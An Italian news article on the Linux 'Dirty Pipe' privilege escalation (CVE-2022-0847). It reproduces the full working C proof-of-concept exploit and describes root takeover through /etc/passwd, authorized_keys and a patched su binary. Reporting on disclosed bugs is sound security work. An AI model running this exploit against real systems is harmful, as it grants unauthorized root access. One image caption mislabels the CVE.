Red Hot Cyber
Condividi la tua difesa. Incoraggia l'eccellenza. La vera forza della cybersecurity risiede nell'effetto moltiplicatore della conoscenza.
Condividi la tua difesa. Incoraggia l'eccellenza.
La vera forza della cybersecurity risiede
nell'effetto moltiplicatore della conoscenza.
HackTheBox 970x120 1
Banner Ransomfeed 320x100 1
Linux: Dopo Dirty Cow ecco Dirty Pipe. Una nuova privilege escalation.

Linux: Dopo Dirty Cow ecco Dirty Pipe. Una nuova privilege escalation.

7 Marzo 2022 23:49

Una nuova vulnerabilità di Linux nota come “Dirty Pipe” consente agli utenti locali di ottenere i privilegi di root tramite un exploit disponibili pubblicamente.

Il ricercatore di sicurezza Max Kellermann ha rivelato responsabilmente la vulnerabilità “Dirty Pipe” e ha affermato che colpisce il kernel Linux 5.8 e versioni successive, anche su dispositivi Android.

La vulnerabilità è stata divulgata responsabilmente a vari manutentori Linux a partire dal 20 febbraio 2022, inclusi il team di sicurezza del kernel Linux e il team di sicurezza Android.


Cyber Offensive Fundamentale Ethical Hacking 02

Avvio delle iscrizioni al corso Cyber Offensive Fundamentals
Vuoi smettere di guardare tutorial e iniziare a capire davvero come funziona la sicurezza informatica?
La base della sicurezza informatica, al di là di norme e tecnologie, ha sempre un unico obiettivo: fermare gli attacchi dei criminali informatici. Pertanto "Pensa come un attaccante, agisci come un difensore". Ti porteremo nel mondo dell'ethical hacking e del penetration test come nessuno ha mai fatto prima. Per informazioni potete accedere alla pagina del corso oppure contattarci tramite WhatsApp al numero 379 163 8765 oppure scrivendoci alla casella di posta [email protected].


Supporta Red Hot Cyber attraverso: 

  1. L'acquisto del fumetto sul Cybersecurity Awareness
  2. Ascoltando i nostri Podcast
  3. Seguendo RHC su WhatsApp
  4. Seguendo RHC su Telegram
  5. Scarica gratuitamente “Byte The Silence”, il fumetto sul Cyberbullismo di Red Hot Cyber

Se ti piacciono le novità e gli articoli riportati su di Red Hot Cyber, iscriviti immediatamente alla newsletter settimanale per non perdere nessun articolo. La newsletter generalmente viene inviata ai nostri lettori ad inizio settimana, indicativamente di lunedì.

Sebbene il bug sia stato corretto nei kernel Linux 5.16.11, 5.15.25 e 5.10.102, molti server continuano a eseguire kernel obsoleti, rendendo il rilascio di questo exploit un problema significativo per gli amministratori di server.

La vulnerabilità viene rilevata come CVE-2022-0847 e consente a un utente non privilegiato di iniettare e sovrascrivere dati in file di sola lettura, inclusi i processi SUID eseguiti come root.

Kellerman ha scoperto il bug dopo aver rintracciato un bug che stava danneggiando i registri di accesso al server Web per uno dei suoi clienti.

Kellerman afferma che la vulnerabilità è simile alla  vulnerabilità Dirty COW  (CVE-2016-5195) risolta nel 2016.

Come parte della divulgazione di Dirty Pipe , Kellerman ha rilasciato un exploit proof-of-concept (PoC) che consente agli utenti locali di inserire i propri dati in file sensibili di sola lettura, rimuovendo le restrizioni o modificando le configurazioni per fornire un accesso maggiore di quello che avrebbero normalmente.

/* SPDX-License-Identifier: GPL-2.0 */
/*
 * Copyright 2022 CM4all GmbH / IONOS SE
 *
 * author: Max Kellermann <[email protected]>
 *
 * Proof-of-concept exploit for the Dirty Pipe
 * vulnerability (CVE-2022-0847) caused by an uninitialized
 * "pipe_buffer.flags" variable.  It demonstrates how to overwrite any
 * file contents in the page cache, even if the file is not permitted
 * to be written, immutable or on a read-only mount.
 *
 * This exploit requires Linux 5.8 or later; the code path was made
 * reachable by commit f6dd975583bd ("pipe: merge
 * anon_pipe_buf*_ops").  The commit did not introduce the bug, it was
 * there before, it just provided an easy way to exploit it.
 *
 * There are two major limitations of this exploit: the offset cannot
 * be on a page boundary (it needs to write one byte before the offset
 * to add a reference to this page to the pipe), and the write cannot
 * cross a page boundary.
 *
 * Example: ./write_anything /root/.ssh/authorized_keys 1 $'\nssh-ed25519 AAA......\n'
 *
 * Further explanation: https://dirtypipe.cm4all.com/
 */

#define _GNU_SOURCE
#include <unistd.h>
#include <fcntl.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <sys/stat.h>
#include <sys/user.h>

#ifndef PAGE_SIZE
#define PAGE_SIZE 4096
#endif

/**
 * Create a pipe where all "bufs" on the pipe_inode_info ring have the
 * PIPE_BUF_FLAG_CAN_MERGE flag set.
 */
static void prepare_pipe(int p[2])
{
	if (pipe(p)) abort();

	const unsigned pipe_size = fcntl(p[1], F_GETPIPE_SZ);
	static char buffer[4096];

	/* fill the pipe completely; each pipe_buffer will now have
	   the PIPE_BUF_FLAG_CAN_MERGE flag */
	for (unsigned r = pipe_size; r > 0;) {
		unsigned n = r > sizeof(buffer) ? sizeof(buffer) : r;
		write(p[1], buffer, n);
		r -= n;
	}

	/* drain the pipe, freeing all pipe_buffer instances (but
	   leaving the flags initialized) */
	for (unsigned r = pipe_size; r > 0;) {
		unsigned n = r > sizeof(buffer) ? sizeof(buffer) : r;
		read(p[0], buffer, n);
		r -= n;
	}

	/* the pipe is now empty, and if somebody adds a new
	   pipe_buffer without initializing its "flags", the buffer
	   will be mergeable */
}

int main(int argc, char **argv)
{
	if (argc != 4) {
		fprintf(stderr, "Usage: %s TARGETFILE OFFSET DATA\n", argv[0]);
		return EXIT_FAILURE;
	}

	/* dumb command-line argument parser */
	const char *const path = argv[1];
	loff_t offset = strtoul(argv[2], NULL, 0);
	const char *const data = argv[3];
	const size_t data_size = strlen(data);

	if (offset % PAGE_SIZE == 0) {
		fprintf(stderr, "Sorry, cannot start writing at a page boundary\n");
		return EXIT_FAILURE;
	}

	const loff_t next_page = (offset | (PAGE_SIZE - 1)) + 1;
	const loff_t end_offset = offset + (loff_t)data_size;
	if (end_offset > next_page) {
		fprintf(stderr, "Sorry, cannot write across a page boundary\n");
		return EXIT_FAILURE;
	}

	/* open the input file and validate the specified offset */
	const int fd = open(path, O_RDONLY); // yes, read-only! :-)
	if (fd < 0) {
		perror("open failed");
		return EXIT_FAILURE;
	}

	struct stat st;
	if (fstat(fd, &st)) {
		perror("stat failed");
		return EXIT_FAILURE;
	}

	if (offset > st.st_size) {
		fprintf(stderr, "Offset is not inside the file\n");
		return EXIT_FAILURE;
	}

	if (end_offset > st.st_size) {
		fprintf(stderr, "Sorry, cannot enlarge the file\n");
		return EXIT_FAILURE;
	}

	/* create the pipe with all flags initialized with
	   PIPE_BUF_FLAG_CAN_MERGE */
	int p[2];
	prepare_pipe(p);

	/* splice one byte from before the specified offset into the
	   pipe; this will add a reference to the page cache, but
	   since copy_page_to_iter_pipe() does not initialize the
	   "flags", PIPE_BUF_FLAG_CAN_MERGE is still set */
	--offset;
	ssize_t nbytes = splice(fd, &offset, p[1], NULL, 1, 0);
	if (nbytes < 0) {
		perror("splice failed");
		return EXIT_FAILURE;
	}
	if (nbytes == 0) {
		fprintf(stderr, "short splice\n");
		return EXIT_FAILURE;
	}

	/* the following write will not create a new pipe_buffer, but
	   will instead write into the page cache, because of the
	   PIPE_BUF_FLAG_CAN_MERGE flag */
	nbytes = write(p[1], data, data_size);
	if (nbytes < 0) {
		perror("write failed");
		return EXIT_FAILURE;
	}
	if ((size_t)nbytes < data_size) {
		fprintf(stderr, "short write\n");
		return EXIT_FAILURE;
	}

	printf("It worked!\n");
	return EXIT_SUCCESS;
}

Ad esempio, il ricercatore di sicurezza Phith0n ha  illustrato come utilizzare l’exploit per modificare il file /etc/passwd in modo che l’utente root non abbia una password. 

Demonstration of the CVE-2016-5195 DirtyPipe vulnerability
Esempio di lancio dell’exploit (fonte BleepingComputer)

Una volta eseguita questa modifica, l’utente non privilegiato può semplicemente eseguire il comando “su root” per ottenere l’accesso all’account root

Tuttavia, oggi è stato rilasciato pubblicamente anche un exploit aggiornato dal ricercatore di sicurezza BLASTY  che rende ancora più facile ottenere i privilegi di root applicando una patch al comando /usr/bin/su per rilasciare una shell di root in /tmp/sh e quindi e lo script.

Ti è piaciuto questo articolo? Ne stiamo discutendo nella nostra Community su LinkedIn, Facebook e Instagram. Seguici anche su Google News, per ricevere aggiornamenti quotidiani sulla sicurezza informatica o Scrivici se desideri segnalarci notizie, approfondimenti o contributi da pubblicare.

Cropped RHC 3d Transp2 1766828557 300x300
La redazione di Red Hot Cyber è composta da professionisti del settore IT e della sicurezza informatica, affiancati da una rete di fonti qualificate che operano anche in forma riservata. Il team lavora quotidianamente nell’analisi, verifica e pubblicazione di notizie, approfondimenti e segnalazioni su cybersecurity, tecnologia e minacce digitali, con particolare attenzione all’accuratezza delle informazioni e alla tutela delle fonti. Le informazioni pubblicate derivano da attività di ricerca diretta, esperienza sul campo e contributi provenienti da contesti operativi nazionali e internazionali.

Articoli in evidenza

Immagine del sitoCybercrime
Basta un riavvio: il trucco che spegne Windows Defender prima ancora che parta
Redazione RHC - 13/01/2026

A volte, per disattivare la protezione di Windows non è necessario attaccare direttamente l’antivirus. È sufficiente impedirne il corretto avvio. Un ricercatore che si fa chiamare Two Seven One Three (TwoSevenOneT) ha pubblicato su GitHub…

Immagine del sitoCultura
La mente dietro le password: Errore umano? No, un legame che non c’è. Puntata 4
Simone D'Agostino - 13/01/2026

Quando la sicurezza fallisce prima ancora dell’errore Questo testo nasce dall’esperienza diretta, maturata osservando nel tempo numerosi casi di frodi e incidenti informatici, in cui il fattore umano nella sicurezza è stato l’elemento che ha…

Immagine del sitoCultura
Burnout: un allarme di sistema nell’IT e nella Cyber Security aziendale
Paloma Donadi - 13/01/2026

Nel mondo della cybersecurity si parla spesso di attacchi, vulnerabilità, incidenti. Si parla meno di una variabile silenziosa che attraversa tutto il settore: la fatica. Non la stanchezza di fine giornata, ma una fatica più…

Immagine del sitoCyberpolitica
Quando il segnale muore, il potere vince: il blackout digitale dell’Iran
Roberto Villani - 13/01/2026

A volte le cose importanti non arrivano in conferenza stampa. Arrivano come un grafico che smette di respirare: la linea della connettività che crolla, l’OSINT che si inaridisce, il rumore che cresce perché il segnale…

Immagine del sitoVulnerabilità
Vulnerabilità critica in ServiceNow: i rischi sono lo spoofing dell’identità
Redazione RHC - 13/01/2026

Una falla critica è stata individuata nella piattaforma di intelligenza artificiale di ServiceNow, con un punteggio di gravità pari a 9,3 su 10. Questa vulnerabilità, catalogata come CVE-2025-12420, potrebbe permettere a malintenzionati di impersonare utenti…